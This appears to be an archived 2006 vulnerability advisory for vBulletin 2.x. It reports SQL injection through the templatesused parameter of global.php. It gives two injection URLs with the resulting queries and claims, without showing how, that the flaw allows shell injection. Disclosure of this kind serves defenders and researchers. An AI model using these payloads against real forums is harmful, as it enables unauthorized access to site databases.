Vbulletin 2.X sql injection

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14442
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

Hello,,

Vbulletin 2.X sql injection

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

This is sql injection in vbulletin systems

the injection is in the global.php file

we can use it

global.php?templatesused=))/*

the query will be SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

global.php?templatesused=nn,dd,'))/ SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

It Can be used as shell injection

Tested on VB 2.3.X and other versions are injected ..(2.X)

WwW.SoQoR.NeT